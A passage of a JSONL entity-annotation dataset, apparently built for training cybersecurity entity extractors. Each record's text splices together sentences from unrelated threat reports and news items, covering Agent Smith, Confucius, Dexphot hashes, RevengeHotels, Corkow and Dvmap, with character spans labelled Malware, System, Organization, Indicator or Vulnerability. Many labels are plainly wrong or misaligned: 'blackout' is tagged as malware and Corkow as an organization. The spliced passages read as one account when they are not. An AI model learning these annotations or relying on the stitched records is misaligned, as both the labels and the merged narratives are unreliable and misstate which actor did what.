To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": [{"start": 47, "end": 58, "label": "Malware"}, {"start": 350, "end": 372, "label": "System"}, {"start": 415, "end": 422, "label": "Malware"}, {"start": 561, "end": 616, "label": "Indicator"}]} {"text": "Its dropper family finished integration with Bundle Feng Shui and campaign C & C infrastructure was shifted to AWS cloud . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets . Dexphot : 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f . FireEye detects this activity across our platforms .", "spans": [{"start": 111, "end": 114, "label": "System"}, {"start": 133, "end": 139, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 296, "end": 303, "label": "Organization"}]} {"text": "The Campaign achieved exponential growth from June to December 2018 with the infection number staying stable into early 2019 . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 . 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 286, "end": 292, "label": "System"}, {"start": 299, "end": 310, "label": "System"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 348, "end": 355, "label": "Malware"}, {"start": 358, "end": 422, "label": "Indicator"}, {"start": 502, "end": 517, "label": "System"}]} {"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of \u201c Agent Smith \u201d dropped significantly . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. \u2019s critical infrastructure security ( and more ) .", "spans": [{"start": 73, "end": 84, "label": "Malware"}, {"start": 127, "end": 138, "label": "Malware"}, {"start": 161, "end": 172, "label": "Malware"}, {"start": 211, "end": 227, "label": "System"}, {"start": 230, "end": 237, "label": "Malware"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 323, "end": 343, "label": "Organization"}]} {"text": "From early April , hackers started to build a new major update to the \u201c Agent Smith \u201d campaign under the name \u201c leechsdk \u201d . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Dexphot : ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 . 
Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": [{"start": 72, "end": 83, "label": "Malware"}, {"start": 129, "end": 140, "label": "Malware"}, {"start": 155, "end": 193, "label": "Malware"}, {"start": 196, "end": 226, "label": "Malware"}, {"start": 229, "end": 233, "label": "System"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 271, "end": 335, "label": "Indicator"}, {"start": 338, "end": 364, "label": "Organization"}, {"start": 428, "end": 467, "label": "Organization"}]} {"text": "Figure 26 : \u201c Agent Smith \u201d Campaign timeline Greater \u201c Agent Smith \u201d Campaign Discovery Orchestrating a successful 9Apps centric malware campaign , the actor behind \u201c Agent Smith \u201d established solid strategies in malware proliferation and payload delivery . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. 
Appeals Court has put a hold on this rule for the time being ( though it did n\u2019t give a precise reason at the time of its ruling ) .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 56, "end": 67, "label": "Malware"}, {"start": 116, "end": 121, "label": "System"}, {"start": 168, "end": 179, "label": "Malware"}, {"start": 406, "end": 424, "label": "System"}, {"start": 433, "end": 444, "label": "Malware"}, {"start": 466, "end": 474, "label": "System"}, {"start": 477, "end": 484, "label": "Malware"}, {"start": 487, "end": 551, "label": "Indicator"}, {"start": 576, "end": 599, "label": "Organization"}, {"start": 695, "end": 713, "label": "Organization"}]} {"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 . Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , \u201c exercise strict oversight on CISA \u2019s efforts \u201d to implement many of the policies outlined .", "spans": [{"start": 255, "end": 274, "label": "Organization"}, {"start": 289, "end": 300, "label": "Malware"}, {"start": 305, "end": 316, "label": "Malware"}, {"start": 319, "end": 326, "label": "Malware"}, {"start": 329, "end": 393, "label": "Indicator"}, {"start": 434, "end": 444, "label": "Organization"}, {"start": 470, "end": 490, "label": "Organization"}, {"start": 553, "end": 565, "label": "Organization"}]} {"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a malicious yet dormant SDK related to \u201c Agent Smith \u201d actor . 
In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains . Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": [{"start": 65, "end": 82, "label": "System"}, {"start": 137, "end": 148, "label": "Malware"}, {"start": 425, "end": 432, "label": "Malware"}, {"start": 435, "end": 499, "label": "Indicator"}, {"start": 602, "end": 611, "label": "Organization"}]} {"text": "This discovery indicates the actor \u2019 s ambition in expanding operations into Google Play store with previous success experience from the main \u201c Agent Smith \u201d campaign . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . RevengeHotels : cybercrime targeting hotel front desks worldwide . Say these arguments extend through the 2024 election \u2014 what happens if control of the White House or Congress switches between parties ?", "spans": [{"start": 77, "end": 88, "label": "System"}, {"start": 144, "end": 155, "label": "Malware"}, {"start": 173, "end": 188, "label": "Malware"}, {"start": 210, "end": 228, "label": "Malware"}, {"start": 231, "end": 239, "label": "Malware"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 257, "end": 262, "label": "Malware"}, {"start": 276, "end": 288, "label": "Malware"}, {"start": 291, "end": 304, "label": "Organization"}, {"start": 444, "end": 455, "label": "Organization"}]} {"text": "Instead of embedding core malware payload in droppers , the actor switches to a more low-key SDK approach . 
Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . RevengeHotels is a targeted cybercrime malware campaign against hotels , hostels , hospitality and tourism companies , mainly , but not exclusively , located in Brazil . Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": [{"start": 108, "end": 118, "label": "System"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 231, "end": 245, "label": "Vulnerability"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 480, "end": 497, "label": "Organization"}, {"start": 506, "end": 525, "label": "Organization"}, {"start": 528, "end": 550, "label": "Organization"}, {"start": 555, "end": 569, "label": "Organization"}]} {"text": "In the dangerous module lies a kill switch logic which looks for the keyword \u201c infect \u201d . We dove deeper into Confucius' operations\u2014namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns . We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": []} {"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . 
The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": [{"start": 116, "end": 131, "label": "System"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 359, "end": 381, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 399, "end": 410, "label": "Indicator"}, {"start": 444, "end": 481, "label": "Malware"}, {"start": 486, "end": 499, "label": "System"}, {"start": 512, "end": 517, "label": "System"}]} {"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . The main attack vector is via email with crafted Word , Excel or PDF documents attached . If you \u2019re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": [{"start": 94, "end": 107, "label": "Vulnerability"}, {"start": 138, "end": 154, "label": "System"}, {"start": 157, "end": 160, "label": "Malware"}, {"start": 290, "end": 299, "label": "Malware"}, {"start": 463, "end": 477, "label": "Organization"}, {"start": 481, "end": 497, "label": "Organization"}, {"start": 535, "end": 548, "label": "Organization"}]} {"text": "The below code snippet is currently isolated and dormant . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected . 
Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim \u2019s machine . For those who fall outside of that demographic , it \u2019s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": [{"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 164, "end": 177, "label": "Vulnerability"}, {"start": 205, "end": 215, "label": "System"}, {"start": 267, "end": 277, "label": "Malware"}, {"start": 280, "end": 285, "label": "Malware"}, {"start": 288, "end": 299, "label": "Malware"}, {"start": 302, "end": 309, "label": "Malware"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 522, "end": 531, "label": "System"}]} {"text": "In the future , it will be invoked by malicious SDK during banner ads display . Corkow provided remote access to the ITS-Broker system terminal by \u300a Platforma soft \u300b Ltd , which enabled the fraud to be committed . The group has been active since 2015 , but increased its attacks in 2019 . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": [{"start": 80, "end": 86, "label": "System"}, {"start": 320, "end": 326, "label": "Organization"}]} {"text": "Figure 26 : the kill switch code snippet Evidence implies that the \u201c Agent Smith \u201d actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . 
In our research , we were also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": [{"start": 69, "end": 80, "label": "Malware"}, {"start": 141, "end": 152, "label": "System"}, {"start": 288, "end": 306, "label": "Malware"}, {"start": 381, "end": 403, "label": "Organization"}, {"start": 621, "end": 645, "label": "System"}, {"start": 673, "end": 690, "label": "Organization"}, {"start": 705, "end": 714, "label": "Organization"}]} {"text": "By the time of this publication , two Jaguar Kill Switch infected app has reached 10 million downloads while others are still in their early stages . The interest among hackers in targeting trading systems is expected to grow . PaloAlto has already written about one of them . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": [{"start": 228, "end": 236, "label": "Organization"}]} {"text": "Check Point Research reported these dangerous apps to Google upon discovery . Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan . We named the first group RevengeHotels , and the second ProCC . 
Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 165, "end": 178, "label": "System"}, {"start": 206, "end": 219, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 245, "end": 277, "label": "Organization"}, {"start": 334, "end": 358, "label": "Organization"}, {"start": 363, "end": 390, "label": "Organization"}, {"start": 407, "end": 423, "label": "Organization"}]} {"text": "Currently , all bespoke apps have been taken down from the Google Play store . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 . These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people . The U.S. 
Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that \u201c advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data \u201d after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": [{"start": 59, "end": 70, "label": "System"}, {"start": 94, "end": 113, "label": "Organization"}, {"start": 456, "end": 518, "label": "Organization"}, {"start": 551, "end": 563, "label": "Organization"}, {"start": 601, "end": 610, "label": "Organization"}, {"start": 627, "end": 668, "label": "Organization"}, {"start": 669, "end": 780, "label": "Indicator"}, {"start": 790, "end": 821, "label": "System"}]} {"text": "Figure 28 : Jaguar Kill Switch infected GP apps Peek Into the Actor Based on all of the above , we connected \u201c Agent Smith \u201d campaign to a Chinese internet company located in Guangzhou whose front end legitimate business is to help Chinese Android developers publish and promote their apps on overseas platforms . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 . Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": [{"start": 111, "end": 122, "label": "Malware"}, {"start": 240, "end": 247, "label": "System"}, {"start": 393, "end": 397, "label": "System"}, {"start": 404, "end": 411, "label": "System"}, {"start": 489, "end": 492, "label": "Indicator"}]} {"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name . 
As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program . They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": [{"start": 51, "end": 122, "label": "System"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 506, "end": 510, "label": "Organization"}, {"start": 514, "end": 523, "label": "Organization"}, {"start": 601, "end": 612, "label": "Organization"}, {"start": 631, "end": 634, "label": "Organization"}]} {"text": "Interestingly , we uncovered several expired job posting of Android reverse engineer from the actor \u2019 s front business published in 2018 and 2019 . Hackers gained access to a computer in the trading system in September 2014 . We monitored the activities of these groups and the new malware they are creating for over a year . \u201c Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , \u201d the report states .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 328, "end": 337, "label": "System"}]} {"text": "It seems that the people who filled these roles are key to \u201c Agent Smith \u2019 s success , yet not quite necessary for actor \u2019 s legitimate side of business . Starting in December 2014 , the criminal group began running keyloggers in the infected system . 
With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks . ( CISA , CNN )", "spans": [{"start": 61, "end": 72, "label": "Malware"}, {"start": 216, "end": 226, "label": "System"}, {"start": 509, "end": 513, "label": "Organization"}, {"start": 516, "end": 519, "label": "Organization"}]} {"text": "With a better understanding of the \u201c Agent Smith \u201d actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor \u2019 s unusual practices in choosing targets . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . One of the tactics used in operations by these groups is highly targeted spear-phishing messages . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": [{"start": 37, "end": 48, "label": "Malware"}, {"start": 484, "end": 526, "label": "Organization"}, {"start": 547, "end": 556, "label": "Organization"}, {"start": 636, "end": 642, "label": "System"}, {"start": 647, "end": 651, "label": "System"}]} {"text": "It seems , \u201c Agent Smith \u201d prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor \u2019 s legitimate business arm to suppress competition . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . They register typo-squatting domains , impersonating legitimate companies . 
Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google \u2019s tracking pixels on their sites , potentially violating U.S. law and sharing taxpayers \u2019 information with those companies .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 68, "end": 73, "label": "Vulnerability"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 302, "end": 324, "label": "System"}, {"start": 327, "end": 339, "label": "System"}, {"start": 342, "end": 358, "label": "System"}, {"start": 361, "end": 388, "label": "System"}, {"start": 391, "end": 404, "label": "System"}, {"start": 497, "end": 517, "label": "Organization"}, {"start": 559, "end": 565, "label": "Organization"}, {"start": 568, "end": 577, "label": "Organization"}, {"start": 582, "end": 591, "label": "System"}, {"start": 605, "end": 609, "label": "Organization"}, {"start": 614, "end": 639, "label": "Organization"}, {"start": 649, "end": 654, "label": "System"}]} {"text": "Conclusion Although the actor behind \u201c Agent Smith \u201d decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . The emails are well written , with an abundance of detail . 
The report says the data was kept anonymous , but the companies could \u201c easily \u201d use the information to identify individuals or create targeted advertising for them .", "spans": [{"start": 39, "end": 50, "label": "Malware"}, {"start": 228, "end": 246, "label": "Vulnerability"}, {"start": 268, "end": 280, "label": "Vulnerability"}, {"start": 361, "end": 367, "label": "System"}]} {"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user \u2019 s digital even physical security . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems . They explain why the company has chosen to book that particular hotel . ( Vox , USA Today )", "spans": [{"start": 183, "end": 191, "label": "Organization"}, {"start": 241, "end": 263, "label": "Organization"}, {"start": 313, "end": 327, "label": "System"}, {"start": 453, "end": 456, "label": "Organization"}, {"start": 459, "end": 468, "label": "Organization"}]} {"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis . By checking the sender information , it \u2019s possible to determine whether the company actually exists . 
Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": [{"start": 421, "end": 426, "label": "Organization"}, {"start": 511, "end": 534, "label": "Vulnerability"}, {"start": 538, "end": 544, "label": "Organization"}]} {"text": "The \u201c Agent Smith \u201d campaign serves as a sharp reminder that effort from system developers alone is not enough to build a secure Android eco-system . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 . However , there is a small difference between the domain used to send the email and the real one . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": [{"start": 6, "end": 17, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 176, "end": 182, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 430, "end": 435, "label": "System"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 516, "end": 523, "label": "System"}, {"start": 528, "end": 533, "label": "System"}, {"start": 552, "end": 568, "label": "Vulnerability"}, {"start": 612, "end": 630, "label": "System"}, {"start": 643, "end": 649, "label": "System"}, {"start": 660, "end": 672, "label": "System"}]} {"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . 
This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain . However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": [{"start": 223, "end": 229, "label": "System"}, {"start": 615, "end": 621, "label": "System"}, {"start": 670, "end": 678, "label": "System"}, {"start": 681, "end": 690, "label": "System"}, {"start": 695, "end": 699, "label": "System"}, {"start": 710, "end": 715, "label": "Organization"}]} {"text": "It is also another example for why organizations and consumers alike should have an advanced mobile threat prevention solution installed on the device to protect themselves against the possibility of unknowingly installing malicious apps , even from trusted app stores . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": [{"start": 296, "end": 302, "label": "System"}, {"start": 643, "end": 648, "label": "Organization"}, {"start": 672, "end": 675, "label": "System"}, {"start": 678, "end": 684, "label": "System"}, {"start": 689, "end": 694, "label": "System"}]} {"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . 
Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 18, "end": 25, "label": "System"}, {"start": 151, "end": 168, "label": "System"}, {"start": 216, "end": 231, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 406, "end": 439, "label": "Indicator"}, {"start": 442, "end": 479, "label": "Indicator"}, {"start": 529, "end": 532, "label": "System"}, {"start": 636, "end": 652, "label": "Vulnerability"}, {"start": 683, "end": 792, "label": "Indicator"}]} {"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software . The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload . 
( Forbes , Gizmodo ) \u2022 Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over \u2022 Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos \u2022 New Threat Actor Launches Cyber - attacks on Ukraine and Poland \u2022", "spans": [{"start": 188, "end": 202, "label": "System"}, {"start": 222, "end": 239, "label": "System"}, {"start": 270, "end": 273, "label": "System"}, {"start": 348, "end": 351, "label": "System"}, {"start": 370, "end": 380, "label": "System"}, {"start": 438, "end": 444, "label": "Organization"}, {"start": 447, "end": 454, "label": "Organization"}, {"start": 483, "end": 514, "label": "Vulnerability"}, {"start": 518, "end": 532, "label": "System"}, {"start": 535, "end": 547, "label": "System"}, {"start": 581, "end": 608, "label": "System"}, {"start": 641, "end": 652, "label": "Organization"}, {"start": 681, "end": 696, "label": "Organization"}]} {"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation \u2022", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 36, "end": 60, "label": "Indicator"}, {"start": 68, "end": 71, "label": "Malware"}, {"start": 169, "end": 209, "label": "Malware"}, {"start": 219, "end": 232, "label": "Organization"}, {"start": 269, "end": 273, "label": "Indicator"}, {"start": 302, "end": 317, "label": "Malware"}, {"start": 345, "end": 356, "label": "System"}, {"start": 361, "end": 375, "label": "System"}]} {"text": "The distribution of rooting malware through Google Play is not a new thing . 
To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . After unpacking them , the code is recognizable as the commercial RAT RevengeRAT . Talos Takes Ep .", "spans": [{"start": 44, "end": 55, "label": "System"}, {"start": 80, "end": 107, "label": "Malware"}, {"start": 121, "end": 131, "label": "System"}, {"start": 143, "end": 149, "label": "System"}, {"start": 174, "end": 198, "label": "Malware"}, {"start": 201, "end": 239, "label": "Malware"}, {"start": 317, "end": 320, "label": "Malware"}, {"start": 321, "end": 331, "label": "Malware"}, {"start": 334, "end": 339, "label": "Organization"}]} {"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 . Hackers used the remote access to detect servers of their interest in the internal network . An additional module written by the group called ScreenBooking is used to capture credit card data . # 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos \u201c Most prevalent malware files \u201d is taking a break this week for maintenance .", "spans": [{"start": 18, "end": 30, "label": "Malware"}, {"start": 52, "end": 63, "label": "System"}, {"start": 246, "end": 259, "label": "Malware"}, {"start": 323, "end": 341, "label": "Organization"}, {"start": 405, "end": 410, "label": "Organization"}]} {"text": "But Dvmap is very special rooting malware . In 2015 , the Metel gang began to target banks and financial institutions directly . It monitors whether the user is browsing the web page . 
On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 85, "end": 90, "label": "Organization"}, {"start": 95, "end": 117, "label": "Organization"}, {"start": 244, "end": 252, "label": "Malware"}]} {"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries \u2013 libdmv.so or libandroid_runtime.so . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": [{"start": 131, "end": 140, "label": "Indicator"}, {"start": 144, "end": 165, "label": "Indicator"}, {"start": 168, "end": 173, "label": "System"}, {"start": 179, "end": 193, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 425, "end": 433, "label": "Malware"}, {"start": 472, "end": 491, "label": "Organization"}, {"start": 547, "end": 558, "label": "Organization"}]} {"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots . 
Shortly thereafter , ESET \u00ae researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 27, "end": 34, "label": "System"}, {"start": 146, "end": 163, "label": "System"}, {"start": 620, "end": 638, "label": "Organization"}, {"start": 664, "end": 675, "label": "Malware"}]} {"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions . In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the card details ) . They have named it Industroyer \u2013 the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 283, "end": 294, "label": "Indicator"}, {"start": 377, "end": 388, "label": "Malware"}, {"start": 413, "end": 445, "label": "System"}]} {"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America . The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use \u2013 systems developed decades ago with almost no security measures .", "spans": [{"start": 10, "end": 27, "label": "System"}]} {"text": "Usually they would upload a clean version back on Google Play the very same day . 
